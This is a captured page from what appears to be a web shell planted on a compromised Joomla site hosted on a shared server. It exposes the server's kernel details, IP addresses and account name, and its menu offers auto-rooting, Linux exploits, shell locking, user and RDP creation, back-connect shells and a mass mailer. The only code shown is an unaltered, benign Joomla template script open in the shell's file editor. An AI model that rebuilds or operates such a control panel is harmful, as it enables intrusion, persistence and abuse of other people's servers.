Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_templates /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-template-compare-es5.js
1.89
KB
-rw----r--
admin-template-compare-es5.min...
818
B
-rw----r--
admin-template-compare-es5.min...
507
B
-rw----r--
admin-template-compare.js
1.69
KB
-rw----r--
admin-template-compare.min.js
780
B
-rw----r--
admin-template-compare.min.js....
491
B
-rw----r--
admin-template-toggle-assignme...
742
B
-rw----r--
admin-template-toggle-assignme...
338
B
-rw----r--
admin-template-toggle-assignme...
206
B
-rw----r--
admin-template-toggle-assignme...
631
B
-rw----r--
admin-template-toggle-assignme...
276
B
-rw----r--
admin-template-toggle-assignme...
188
B
-rw----r--
admin-template-toggle-switch-e...
3.43
KB
-rw----r--
admin-template-toggle-switch-e...
1.76
KB
-rw----r--
admin-template-toggle-switch-e...
484
B
-rw----r--
admin-template-toggle-switch.j...
3.16
KB
-rw----r--
admin-template-toggle-switch.m...
1.72
KB
-rw----r--
admin-template-toggle-switch.m...
467
B
-rw----r--
admin-templates-default-es5.js
5.05
KB
-rw----r--
admin-templates-default-es5.mi...
2.62
KB
-rw----r--
admin-templates-default-es5.mi...
794
B
-rw----r--
admin-templates-default.js
4.71
KB
-rw----r--
admin-templates-default.min.js
2.49
KB
-rw----r--
admin-templates-default.min.js...
778
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-template-toggle-switch.js
/** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (() => { const showDiffChangedOff = () => { const diffMain = document.getElementById('diff-main'); if (diffMain) { diffMain.classList.remove('active'); if (typeof Storage !== 'undefined') { localStorage.removeItem('diffSwitchState'); } } }; const showDiffChangedOn = () => { const diffMain = document.getElementById('diff-main'); if (diffMain) { diffMain.classList.add('active'); if (typeof Storage !== 'undefined') { localStorage.setItem('diffSwitchState', 'checked'); } } }; const showCoreChangedOff = () => { const override = document.getElementById('override-pane'); const corePane = document.getElementById('core-pane'); const fieldset = override.parentElement.parentElement; if (corePane && override) { corePane.classList.remove('active'); if (fieldset.classList.contains('options-grid-form-half')) { fieldset.classList.remove('options-grid-form-half'); fieldset.classList.add('options-grid-form-full'); } if (typeof Storage !== 'undefined') { localStorage.removeItem('coreSwitchState'); } } }; const showCoreChangedOn = () => { const override = document.getElementById('override-pane'); const corePane = document.getElementById('core-pane'); const fieldset = override.parentElement.parentElement; if (corePane && override) { corePane.classList.add('active'); if (fieldset.classList.contains('options-grid-form-full')) { fieldset.classList.remove('options-grid-form-full'); fieldset.classList.add('options-grid-form-half'); } if (Joomla.editors.instances.jform_core) { Joomla.editors.instances.jform_core.refresh(); } if (typeof Storage !== 'undefined') { localStorage.setItem('coreSwitchState', 'checked'); } } }; document.addEventListener('DOMContentLoaded', () => { const JformShowDiffOn = document.getElementById('jform_show_diff1'); const JformShowDiffOff = document.getElementById('jform_show_diff0'); const JformShowCoreOn = document.getElementById('jform_show_core1'); const JformShowCoreOff = document.getElementById('jform_show_core0'); if (JformShowDiffOn && JformShowDiffOff) { JformShowDiffOn.addEventListener('click', showDiffChangedOn); JformShowDiffOff.addEventListener('click', showDiffChangedOff); } if (JformShowCoreOn && JformShowCoreOff) { JformShowCoreOn.addEventListener('click', showCoreChangedOn); JformShowCoreOff.addEventListener('click', showCoreChangedOff); } if (typeof Storage !== 'undefined' && localStorage.getItem('coreSwitchState') && JformShowCoreOn) { JformShowCoreOn.checked = true; JformShowCoreOff.checked = false; showCoreChangedOn(); } if (typeof Storage !== 'undefined' && localStorage.getItem('diffSwitchState') && JformShowDiffOn) { JformShowDiffOn.checked = true; JformShowDiffOff.checked = false; showDiffChangedOn(); } }); })();
Close